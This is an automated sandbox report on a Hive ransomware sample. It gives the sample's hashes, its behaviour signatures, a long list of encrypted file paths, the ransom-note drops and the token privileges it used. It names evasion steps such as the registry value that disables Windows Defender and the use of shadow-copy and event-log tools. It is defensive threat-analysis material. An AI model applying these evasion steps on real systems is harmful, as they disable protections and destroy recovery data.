Malware Analysis Report

2024-10-16 03:11

Sample ID 220113-rj8ymsagb4
Target cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
SHA256 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68

Threat Level: Known bad

The file cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68 was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies security service

Hive

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Clears Windows event logs

Deletes shadow copies

Modifies extensions of user files

Reads user/profile data of web browsers

Launches sc.exe

Drops file in Program Files directory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Interacts with shadow copies

Opens file in notepad (likely ransom note)

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-13 14:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-13 14:14

Reported

2022-01-13 14:19

Platform

win7-en-20211208

Max time kernel

131s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\handsafe.reg C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01680_.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_6WxssGD0Xtk0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate\TAB_ON.GIF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_8Go7NkPMSPg0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_ue8PtMUtep40.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_fkVh5nljW3o0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\rt.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_Nn5REprYylU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0168644.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_dZhtTrAbC2o0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187819.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_0qvgVPcmFf40.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\XLCPRTID.XML.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_naERseSDKM00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\settings.html C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsNotesBackground.wmv C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_DbctwuE_zXg0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_0WW45ZpZf2g0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\DELETE.GIF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_X2SoF_qr_C40.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_eL0ZJ16DIgI0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\PREVIEW.GIF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_FruALYmTiJ00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_RtPE5-pYDWk0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\OLADD.FAE.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_lIQ2nJjTOUU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_l1B0vWLVj-Y0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_NioLwwRjVdw0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_kM59pjtPVtA0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\mshwLatin.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_YvL4SpyD0r00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_bpPiI9Wclqs0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\gadget.xml C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_13TRXlF6-L40.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\WT61FR.LEX.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_Z8E-oRaf0cU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107146.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_rtplzwO_IPQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_-YbGYchrw9w0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref.wmv C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.access.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_JHvJRFj85Ls0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0205462.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_K2PWy-J22Mg0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Pitchbook.potx.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_2bSq3lrjvjg0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0230553.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_-UDa75EWSJo0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Flyout_Thumbnail_Shadow.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_nxODWGWa-1A0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00261_.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_byDWD0fhpYw0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_K_COL.HXK.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_Il3egnRsAiU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_srb6K6ax6jk0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_thwhE_iHHTw0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_kEGfdCiyViQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.HK.XML.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_d0EQAuhH3LQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188587.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_-N1pi17Owx80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_5yds9HCR84c0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_2y5abAVu_Xc0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb__10qzb5soNY0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSCOL11.PPD.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_HvZ9sEr74rI0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\1100.accdt.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_oTmw4JchtsE0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_EzMv_yY2Qbc0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PSWAVY.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_ejyzZ3oct6w0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR29F.GIF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_dsWDZi5c9WE0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECHO\THMBNAIL.PNG.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_GPVrh2xUfu00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\Java\jre7\lib\management\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_FNQSlWsTXQ80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_DA8BY5g9p_M0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_OFF.GIF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_QkywsFw07ag0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_spM1EdEXDHo0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
